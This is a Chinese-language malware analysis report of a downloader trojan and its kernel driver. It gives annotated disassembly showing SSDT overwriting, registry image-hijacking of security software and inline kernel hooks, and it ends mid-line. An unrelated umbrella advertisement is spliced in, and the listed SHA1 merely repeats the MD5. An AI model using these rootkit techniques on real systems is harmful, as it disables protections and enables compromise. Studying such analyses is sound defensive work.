一个下载者的简单分析.doc

一、 基本信息报告名称：02306fe3.exe作者：hostzhen报告更新日期：2012-11-5样本发现日期：样本类型：马样本文件大小被感染文件变化长度：样本文件MD5 校验值：B3D1699BAC5F4682CDA6CA7676F8D333样本文件SHA1 校验值：B3D1699BAC5F4682CDA6CA7676F8D333壳信息：ASPack可能受到威胁的系统：这是一个下载者木马，通过劫持系统进程，通过网络下载大量病毒相关漏洞：已知检测名称：二、 初步分析三、 行为分析开启Filemon.exe、Regmon.exe、procexp.exe等工具，然后运行02306fe3.exe，监控它的行为。主要释放了两个文件infotmp.txt(02306fe3.exe释放)、733d0624.tmp(02306fe3.exe释放)、6ad44e42.sys（explorer.exe释放）、appmgmts.dll（explorer.exe释放），然后删除文件02306fe3.exe和infotmp.txt，如图1.从TcpView.exe、Process explorer 和 Filemon.exe监控可知，该文件有联通网络、下载文件的行为，连接网络的行为如图2.略附件中四、驱动文件分析入口：.text:00400B1B ; NTSTATUS _stdcall DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath).text:00400B1B public DriverEntry.text:00400B1B DriverEntry proc near.text:00400B1B.text:00400B1B DestinationString= UNICODE_STRING ptr -0Ch.text:00400B1B DeviceObject = dword ptr -4.text:00400B1B DriverObject = dword ptr 8.text:00400B1B RegistryPath = dword ptr 0Ch.text:00400B1B.text:00400B1B push ebp.text:00400B1C mov ebp, esp.text:00400B1E sub esp, 0Ch.text:00400B21 push ebx.text:00400B22 push esi.text:00400B23 push edi.text:00400B24 xor edi, edi.text:00400B26 push offset VersionInformation ; lpVersionInformation.text:00400B2B mov ebp+DeviceObject, edi.text:00400B2E call ds:RtlGetVersion.text:00400B34 mov ebx, ds:RtlInitUnicodeString.text:00400B3A push offset SourceString ; DeviceGuntior.text:00400B3F lea eax, ebp+DestinationString.text:00400B42 push eax ; DestinationString.text:00400B43 call ebx ; RtlInitUnicodeString.text:00400B45 mov esi, ebp+DriverObject.text:00400B48 lea eax, ebp+DeviceObject.text:00400B4B push eax ; DeviceObject.text:00400B4C push edi ; Exclusive.text:00400B4D push edi ; DeviceCharacteristics.text:00400B4E push 22h ; DeviceType.text:00400B50 lea eax, ebp+DestinationString.text:00400B53 push eax ; DeviceName驱动名称DeviceGuntior.text:00400B54 push edi ; DeviceExtensionSize.text:00400B55 push esi ; DriverObject.text:00400B56 call ds:IoCreateDevice ; 生成设备对象.text:00400B5C cmp eax, edi.text:00400B5E jnz short loc_400BDE.text:00400B60 mov eax, ebp+DeviceObject.text:00400B63 or dword ptr eax+1Ch, 4.text:00400B67 push offset a?Guntior ; 符号名称?Guntior.text:00400B6C mov edi, offset DestinationString.text:00400B71 push edi ; DestinationString.text:00400B72 call ebx ; RtlInitUnicodeString.text:00400B74 lea eax, ebp+DestinationString.text:00400B77 push eax ; DeviceName.text:00400B78 push edi ; SymbolicLinkName.text:00400B79 call ds:IoCreateSymbolicLink ; 生成符号链接.text:00400B7F mov edi, eax.text:00400B81 test edi, edi.text:00400B83 jz short loc_400B92.text:00400B85 push ebp+DeviceObject ; DeviceObject.text:00400B88 call ds:IoDeleteDevice.text:00400B8E mov eax, edi.text:00400B90 jmp short loc_400BDE.text:00400B92 ; -.text:00400B92.text:00400B92 loc_400B92: ; CODE XREF: DriverEntry+68j.text:00400B92 push 1Bh.text:00400B94 pop ecx.text:00400B95 lea edi, esi+38h.text:00400B98 mov eax, offset sub_400AFD ; 默认的分发函数.text:00400B9D rep stosd.text:00400B9F mov eax, esi+18h.text:00400BA2 mov dword ptr esi+70h, offset myDeviceIoControl ; IRP_MJ_DEVICE_CONTROL.text:00400BA2 ; DeviceIoControl请求的处理函数.text:00400BA9 mov dword ptr esi+34h, offset DriverUnload.text:00400BB0 push 200h ; size_t.text:00400BB5 push 0 ; int.text:00400BB7.text:00400BB7 loc_400BB7: ; CODE XREF: sub_400BE5+13j.text:00400BB7 mov esi, offset word_402598.text:00400BBC push esi ; void *.text:00400BBD mov dword ptr eax+4, offset sub_400B16.text:00400BC4 call memset.text:00400BC9 mov eax, ebp+RegistryPath.text:00400BCC movzx ecx, word ptr eax.text:00400BCF push ecx ; size_t.text:00400BD0 push dword ptr eax+4 ; void *.text:00400BD3 push esi ; void *.text:00400BD4 call memcpy.text:00400BD9 add esp, 18h.text:00400BDC xor eax, eax.text:00400BDE.text:00400BDE loc_400BDE: ; CODE XREF: DriverEntry+43j.text:00400BDE ; DriverEntry+75j.text:00400BDE pop edi.text:00400BDF pop esi.text:00400BE0 pop ebx.text:00400BE1 leave.text:00400BE2.text:00400BE2 locret_400BE2: ; CODE XREF: .text:00400C31j.text:00400BE2 retn 8.text:00400BE2 DriverEntry endp.text:00400BE2默认分发函数没错任何处理，这里主要拦截DeviceIoControl请求的处理信息myDeviceIoControl分析，按功能号贴上入口：.text:004005DD ; NTSTATUS _cdecl myDeviceIoControl(PDEVICE_OBJECT DeviceObject, IRP *pIrp).text:004005DD myDeviceIoControl proc near ; DATA XREF: DriverEntry+87o.text:004005DD.text:004005DD Handle = dword ptr -80h.text:004005DD var_48 = dword ptr -48h.text:004005DD var_44 = dword ptr -44h.text:004005DD DestinationString= LSA_UNICODE_STRING ptr -40h.text:004005DD var_30 = dword ptr -30h.text:004005DD SourceString = OBJECT_ATTRIBUTES ptr -28h.text:004005DD arg_5E = dword ptr 66h.text:004005DD.text:004005DD ; FUNCTION CHUNK AT .text:004006EE SIZE 000002F2 BYTES.text:004005DD ; FUNCTION CHUNK AT .text:00400A53 SIZE 00000059 BYTES.text:004005DD.text:004005DD push ebp.text:004005DE mov ebp, esp.text:004005E0 and esp, 0FFFFFFF8h.text:004005E3 sub esp, 4Ch.text:004005E6 push ebx.text:004005E7 push esi.text:004005E8 push edi.text:004005E9 mov edi, ebp+0Ch ; pIrp.text:004005EC mov esi, edi+60h ; pIrpStack = pIrp-Tail.Overlay.CurrentStackLocation.text:004005EC ; pIrpStack可以得到功能号等信息，在后面经常要使用到这个变量.text:004005EF mov eax, esi+0Ch ; pIrpStack-Parameters.DeviceIoControl.IoControlCode.text:004005EF ; 得到功能号.text:004005F2 xor ebx, ebx.text:004005F4 mov ecx, 222420h.text:004005F9 mov esp+58h+var_48, ebx.text:004005FD cmp eax, ecx.text:004005FF ja loc_400969本教程由深圳天荷伞业的整理 专业从事雨伞、太阳伞、礼品伞、高尔夫伞、发光伞、广告伞等产品的专业雨伞厂 我们的网站是（） 有您的支持我们会更专注。片段1：.text:0040077C.text:0040077C loc_40077C: ; CODE XREF: myDeviceIoControl+33j.text:0040077C push dword ptr esi+8 ; dwIoControlCode:222407h.text:0040077C ; /这个块主要进行获取函数地址并把该地址传给某变量保存.text:0040077C ; 变量的名称以及修正为该函数实际的名称.text:0040077C ; 获取这些函数地址的作用是处理其它功能号时会使用到.text:0040077C ; (size_t).text:0040077F push dword ptr esi+10h ; (void *)pIrpStack-Parameters.QueryInterface.InterfaceSpecificData.text:00400782 push offset dword_4028C0 ; void *.text:00400787 call memcpy.text:0040078C mov ecx, ds:KeServiceDescriptorTable.text:00400792 mov ecx, ecx ; 囧囧ServiceTableBase.text:00400794 mov eax, esi+10h.text:00400797 mov eax+6Ch, ecx.text:0040079A mov ecx, ds:KeServiceDescriptorTable.text:004007A0 mov ecx, ecx+8 ; 嘎嘎，NumberOfService.text:004007A3 mov eax, esi+10h.text:004007A6 mov esi, ds:RtlInitUnicodeString.text:004007AC mov eax+70h, ecx.text:004007AF mov eax, dword_4028C0 ; 取第一个函数MmGetSystemRoutineAddress.text:004007B4 mov MmGetSystemRoutineAddress, eax.text:004007B9 add esp, 0Ch.text:004007BC lea eax, esp+58h+SourceString.text:004007C0 push eax ; SourceString.text:004007C1 lea eax, esp+5Ch+DestinationString.text:004007C5 push eax ; DestinationString.text:004007C6 mov esp+60h+SourceString.Length, 6F0049h.text:004007CE mov esp+60h+SourceString.RootDirectory, 720044h.text:004007D6 mov esp+60h+SourceString.ObjectName, 760069h.text:004007DE mov esp+60h+SourceString.Attributes, 720065h.text:004007E6 mov esp+60h+SourceString.SecurityDescriptor, 62004Fh.text:004007EE mov esp+60h+SourceString.SecurityQualityOfService, 65006Ah.text:004007F6 mov dword ptr esp+50h, 740063h.text:004007FE mov dword ptr esp+54h, 790054h.text:00400806 mov dword ptr esp+58h, 650070h.text:0040080E mov esp+5Ch, ebx ; 0000000.text:00400812 call esi ; RtlInitUnicodeString ; SourceString = LIoDriverObjectType.text:00400814 lea eax, esp+58h+DestinationString.text:00400818 push eax ; PUNICODE_STRING.text:00400819 call MmGetSystemRoutineAddress.text:0040081F push 79h.text:00400821 mov myIoDriverObjectType, eax.text:00400826 pop ebx.text:00400827 lea eax, esp+58h+SourceString.text:0040082B push eax ; SourceString.text:0040082C lea eax, esp+5Ch+DestinationString.text:00400830 push eax ; DestinationString.text:00400831 mov esp+60h+SourceString.Length, 77005Ah.text:00400839 mov esp+60h+SourceString.RootDirectory, 720043h.text:00400841 mov esp+60h+SourceString.ObjectName, 610065h.text:00400849 mov esp+60h+SourceString.Attributes, 650074h.text:00400851 mov esp+60h+SourceString.SecurityDescriptor, 65004Bh.text:00400859 mov esp+60h+SourceString.SecurityQualityOfService, ebx ; 00000000.text:0040085D call esi ; RtlInitUnicodeString ; SourceString = LZwCreateMailslotFile.text:0040085F lea eax, esp+58h+DestinationString.text:00400863 push eax ; PUNICODE_STRING.text:00400864 call MmGetSystemRoutineAddress.text:0040086A mov myZwCreateMailslotFile, eax ; ZwCreateMailslotFile.text:0040086F lea eax, esp+58h+SourceString.text:00400873 push eax ; SourceString.text:00400874 lea eax, esp+5Ch+DestinationString.text:00400878 push eax ; DestinationString.text:00400879 mov esp+60h+SourceString.Length, 77005Ah ; 这里7个mov指令是赋值一个字符串.text:00400881 mov esp+60h+SourceString.RootDirectory, 650053h.text:00400889 mov esp+60h+SourceString.ObjectName, 560074h.text:00400891 mov esp+60h+SourceString.Attributes, 6C0061h.text:00400899 mov esp+60h+SourceString.SecurityDescriptor, 650075h.text:004008A1 mov esp+60h+SourceString.SecurityQualityOfService, 65004Bh.text:004008A9 mov esp+50h, ebx.text:004008AD call esi ; RtlInitUnicodeString ; SourceString=LZwSetVolumeInformationFile.text:004008AF lea eax, esp+58h+DestinationString.text:004008B3 push eax ; PUNICODE_STRING.text:004008B4 call MmGetSystemRoutineAddress.text:004008BA mov myZwSetVolumeInformationFile, eax ; ZwSetVolumeInformationFile.text:004008BF push offset aObreferenceobj ; ObReferenceObjectByName.text:004008C4 lea eax, esp+5Ch+DestinationString.text:004008C8 push eax ; DestinationString.text:004008C9 call esi ; RtlInitUnicodeString.text:004008CB lea eax, esp+58h+DestinationString.text:004008CF push eax ; PUNICODE_STRING.text:004008D0 call MmGetSystemRoutineAddress.text:004008D6 mov myObReferenceObjectByName, eax.text:004008DB push offset aPslookupproces ; PsLookupProcessByProcessId.text:004008E0 lea eax, esp+5Ch+DestinationString.text:004008E4 push eax ; DestinationString.text:004008E5 call esi ; RtlInitUnicodeString.text:004008E7 lea eax, esp+58h+DestinationString.text:004008EB push eax ; PUNICODE_STRING.text:004008EC call MmGetSystemRoutineAddress.text:004008F2 mov myPsLookupProcessByProcessId, eax.text:004008F7 push offset aZwopenkey ; ZwOpenKey.text:004008FC lea eax, esp+5Ch+DestinationString.text:00400900 push eax ; DestinationString.text:00400901 call esi ; RtlInitUnicodeString.text:00400903 lea eax, esp+58h+DestinationString.text:00400907 push eax ; PUNICODE_STRING.text:00400908 call MmGetSystemRoutineAddress.text:0040090E mov myZwOpenKey, eax.text:00400913 mov eax, ds:MmIsAddressValid.text:00400918 mov myMmIsAddressValid, eax.text:0040091D mov eax, ds:KfLowerIrql.text:00400922 mov myKfLowerIrql, eax.text:00400927 mov eax, ds:_wcsnicmp.text:0040092C mov mywcsnicmp, eax.text:00400931 mov eax, ds:swprintf.text:00400936.text:00400936 loc_400936: ; CODE XREF: myDeviceIoControl+3D4j.text:00400936 mov mymemcpy, offset memcpy.text:00400940 mov myRtlInitUnicodeString, esi.text:00400946 mov myswprintf, eax.text:0040094B.text:0040094B loc_40094B: ; CODE XREF: myDeviceIoControl+19Aj.text:0040094B xor ebx, ebx.text:0040094D jmp loc_400A8B片段2：.text:0040072F loc_40072F: ; CODE XREF: myDeviceIoControl+3Ej.text:0040072F mov eax, ds:KeServiceDescriptorTable ; dwIoControlCode:22240Bh 恢复SSDT表.text:00400734 mov ebx, eax.text:00400736 mov eax, esi+10h ; 存放着一个SSDT，新的SSDT.text:00400739 mov esp+18h, eax ; 存放该起始地址.text:0040073D mov eax, edi+3Ch.text:00400740 mov esi, eax ; 存放函数的个数，当前测试环境下有11c个.text:00400742 mov cl, 2 ; NewIrql.text:00400744 call ds:KfRaiseIrql ; 临时提升IRQL.text:0040074A push 0.text:0040074C mov cl, al.text:0040074E call SetMemoryProtect ; 去除内存保护.text:00400753 test esi, esi.text:00400755 jbe short loc_40076A.text:00400757 mov edx, esp+18h.text:0040075B mov eax, ebx ; 原始SSDT.text:0040075D sub edx, ebx.text:0040075F.text:0040075F loc_40075F: ; CODE XREF: myDeviceIoControl+18Bj.text:0040075F mov ebx, edx+eax ; 把新的SSDT表覆盖到KeServiceDescriptorTable.text:00400762 mov eax, ebx.text:00400764 add eax, 4.text:00400767 dec esi.text:00400768 jnz short loc_40075F.text:0040076A.text:0040076A loc_40076A: ; CODE XREF: myDeviceIoControl+178j.text:0040076A push 1.text:0040076C call SetMemoryProtect ; 恢复内存保护.text:00400771 call ds:KfLowerIrql ; 把硬件中斷級恢復到原來的IRQL值.text:00400777 jmp loc_40094B片段3：.text:00400648 mov esi, edi+0Ch ; dwIoControlCode:22241ch 功能：进行映象劫持.text:00400648 ; 各种安全软件的注册表中映象劫持选项，例如.text:00400648 ; R e g i s t r y M a c h i n e S O F T W A R E M i c r o s o f t.text:00400648 ; W i n d o w s N T C u r r e n t V e r s i o n I m a g e F i l e E x e c u t i o n O p t i o n s.text:00400648 ; U f S e A g n t . e x e.text:0040064B push esi ; SourceString.text:0040064C lea eax, esp+24h.text:00400650 push eax ; DestinationString.text:00400651 mov esp+20h, ebx ; 填充0.text:00400655 mov esp+1Ch, ebx.text:00400659 call ds:RtlInitUnicodeString.text:0040065F lea eax, esp+58h+DestinationString.Length+8.text:00400663 mov esp+58h+SourceString.ObjectName, eax.text:00400667 lea eax, esp+58h+DestinationString.text:0040066B push eax ; ULONG.text:0040066C push ebx ; ULONG 0.text:0040066D push ebx ; ULONG 0.text:0040066E push ebx ; PIO_STATUS_BLOCK 0.text:0040066F lea eax, esp+68h+SourceString.text:00400673 push eax ; ObjectAttributes.text:00400674 push 0F003Fh ; ACCESS_MASK.text:00400679 lea eax, esp+70h+var_44.text:0040067D push eax ; PHANDLE.text:0040067E mov esp+74h+SourceString.Length, 18h.text:00400686 mov esp+74h+SourceString.RootDirectory, ebx.text:0040068A mov esp+74h+SourceString.Attributes, 40h.text:00400692 mov esp+74h+SourceString.SecurityDescriptor, ebx.text:00400696 mov esp+74h+SourceString.SecurityQualityOfService, ebx.text:0040069A call myZwCreateMailslotFile.text:004006A0 cmp esp+14h, ebx.text:004006A4 jz loc_400A8B.text:004006AA lea eax, esi+200h.text:004006B0 push eax ; PCWSTR Debugger.text:004006B1 lea eax, esp+2Ch.text:004006B5 push eax ; PUNICODE_STRING.text:004006B6 call myRtlInitUnicodeString.text:004006BC push dword ptr esi+284h ; _DWORD.text:004006C2 lea eax, esi+288h.text:004006C8 push eax ; FS_INFORMATION_CLASS.text:004006C9 push dword ptr esi+280h ; ULONG.text:004006CF lea eax, esp+34h.text:004006D3 push ebx ; PVOID.text:004006D4 push eax ; PIO_STATUS_BLOCK.text:004006D5 push dword ptr esp+28h ; HANDLE.text:004006D9 call myZwSetVolumeInformationFile ;.text:004006D9 ; 写入信息.text:004006DF push dword ptr esp+14h ; Handle.text:004006E3 call ds:ZwClose ; 关闭句柄.text:004006E9 jmp loc_400A8B片段4：loc_400A76: ; dwIoControlCode:0x222428call BeforeDriverUnload ; 恢复环境和删除符号symbolicjmp short loc_400A8B片段5：loc_400A7D: ; dwIoControlCode:0x222424mov eax, edi+IRP.AssociatedIrp.IrpCountmov eax, eax ; IrpCountcall SetHook ; hook 这个地址dword_4028C8到sub_401CF4函数SetHookSetHook proc nearmov cl, 2 ; NewIrql; 这个函数的功能是hook dword_4028C8的头5个字节跳转到sub_401CF4mov dword_402A40, eaxcall ds:KfRaiseIrql ; 临时提升IRQLpush 0mov cl, alcall SetMemoryProtect ; 去除内存保护mov eax, dword_4028C8 ; 一个函数起始地址指针，eg.KeInitializeApclea edx, eax+5 ; 取偏移5个字节后的4个字节内容mov dword_402A44, edxmov byte ptr eax, 0E9h ; jmpmov edx, dword_4028C8mov eax, offset sub_401CF4sub eax, dword_402A44push 1mov edx+1, eax ; jmp sub_401CF4call SetMemoryProtect ; 恢复内存保护call ds:KfLowerIrql ; 恢复IRQLxor eax, eaxretnSetHook endpring3下的病毒文件，与该sys通信控制的函数是void _stdcall sub_405331(int a1)int v1; / ST1C_45HMODULE v2; / ST14_45HANDLE v3; / eax5int v4; / ST20_49int v5; / eax16int v6; / eax19int v7; / eax22signed int j; / sp+0h bp-1E88h24CHAR pszPath; / sp+8h bp-1E80h23HANDLE hObject; / sp+110h bp-1D78h1HANDLE hThread; / sp+114h bp-1D74h1FARPROC v12; / sp+118h bp-1D70h1int OutBuffer; / sp+11Ch bp-1D6Ch1DWORD flNewProtect; / sp+120h bp-1D68h1int v15; / sp+124h bp-1D64h1char v16; / sp+128h bp-1D60h19WCHAR WideCharStr; / sp+928h bp-1560h14char v18; / sp+B28h bp-1360h14int v19; / sp+BA8h bp-12E0h14int v20; / sp+BACh bp-12DCh14int v21; / sp+BB0h bp-12D8h14DWORD pvData; / sp+DB0h bp-10D8h1HMODULE hLibModule; / sp+DB4h bp-10D4h1CHAR MultiByteStr; / sp+DB8h bp-10D0h16char Dst; / sp+11B8h bp-CD0h14DWORD v26; / sp+15BCh bp-8CCh1int (*v27)(LPSTR, LPCSTR, .); / sp+15C0h bp-8C8h1int i; / sp+15C4h bp-8C4h1char InBuffer; / sp+15C8h bp-8C0h12i = 0;v15 = 0;OutBuffer = 0;pvData = 0;flNewProtect = 0;v26 = 0;hThread = 0;hLibModule = 0;v12 = 0;v27 = wsprintfA;hEvent = CreateEventA(0, 0, 0, off_412D08);hObject = OpenEventA(2u, 0, lpName);if ( hObject )SetEvent(hObject);CloseHandle(hObject);sub_40247A(0, 4, 1);if ( dword_414C18 = 1 )CreateThread(0, 0, (LPTHREAD_START_ROUTINE)StartAddress, 0, 0, 0);memset(:MultiByteStr, 0, 0x104u);memset(Str, 0, 0x40u);memset(byte_414F60, 0, 0x40u);GetModuleFileNameA(hModule, :MultiByteStr, 0x104u);strrchr(:MultiByteStr, 92);lstrcpy(v1);*(_DWORD *)strrchr(Str, 46) = 0;sub_403DFF(int)Str, (int)byte_414F60);hLibModule = LoadLibraryA(Psapi.dll);v12 = Ge